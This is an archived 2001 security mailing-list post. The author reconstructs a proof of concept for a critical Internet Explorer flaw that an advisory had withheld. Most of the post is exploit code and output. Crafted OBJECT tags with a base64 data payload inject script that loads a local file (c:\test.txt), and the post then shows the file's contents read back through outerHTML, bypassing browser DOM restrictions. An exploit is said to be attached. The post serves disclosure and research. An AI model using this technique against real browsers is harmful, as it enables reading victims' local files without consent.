[Had to resent everything because the original HTML file was rejected. Sorry if anyone gets it twice.] > NOMEN NESCIO SECURITY ALERT #9000989 666 > Topic: Remote File Execution By Web or Mail: Internet Explorer > Severity: Critical > Datum: 2001-11-21 > There is a critical flaw within the html parser of Internet > Explorer and its interpretation of certain html tags relative to > the HKEY_CLASSES_ROOT\htmlfile_FullWindowEmbed key. > In accordance with the new suggested policy of responsible > disclosure, no exploit and no further details will be made > available at this time to the general public or the vendor. > In 60 days from publication of this advisory full working > exploits and details will be made available to the general public > and vendor at the same time. I don't want to bother anyone with my opinion on partial disclosure so here is just what I came up with after two hours of playing with IE. The advisory mentioned HKEY_CLASSES_ROOT\htmlfile_FullWindowEmbed so creating an object of that type is probably a good idea... <OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13"> </OBJECT> Ok, alert(myObject.outerHTML); gives us the following: <OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13 data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw OzwvcD4= ></OBJECT> Decoding the Base64 string we get (hex dump): 20693325F903CF11 8FD000AA00686F13 .i3%.........ho. 3C703E266E627370 3B3C2F703E <p> </p> The first part is a GUID and the second one looks like HTML. We inject the string "<script>document.location.href="file://c:\\test.txt";</script>" into the object using <OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13" data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+ ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+"> </OBJECT> (There are probably easier ways to do this but I'm not very familiar with IE coding). Now to the the interesting part. After c:\test.txt is loaded we can still access the data parameter of the object using myObject.outerHTML. This time it contains the Base64 encoded version of c:\\test.txt among other things. So doing a alert(myObject.outerHTML); after the local file is loaded we get: <OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13 data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9 FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0R ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K ></OBJECT> with the Base64 string decoding to: 20693325F903CF11 8FD000AA00686F13 .i3%.........ho. 3C21444F43545950 452048544D4C2050 <!DOCTYPE.HTML.P 55424C494320222D 2F2F5733432F2F44 UBLIC."-//W3C//D 54442048544D4C20 342E30205472616E TD.HTML.4.0.Tran 736974696F6E616C 2F2F454E223E0D0A sitional//EN">.. 3C48544D4C3E3C48 4541443E0D0A3C4D <HTML><HEAD>..<M 4554412068747470 2D65717569763D43 ETA.http-equiv=C 6F6E74656E742D54 79706520636F6E74 ontent-Type.cont 656E743D22746578 742F68746D6C3B20 ent="text/html;. 636861727365743D 77696E646F77732D charset=windows- 31323532223E3C2F 484541443E0D0A3C 1252"></HEAD>..< 424F44593E3C584D 503E68656C6C6F20 BODY><XMP>hello. 776F726C643C2F58 4D503E3C2F424F44 world</XMP></BOD 593E3C2F48544D4C 3E0D0A Y></HTML>.. where "hello world" is the contents of c:\test.txt. It all boils down to an ordinary DOM circumvention with all the usual implications. The attached exploit reads c:\test.txt and displays it. I've only tested this on Windows 2k pro with IE 5.50 so confirmation on other OSes / versions is welcome. regards, Markus Kern
This archive was generated by hypermail 2b30 : Fri Nov 23 2001 - 18:10:29 PST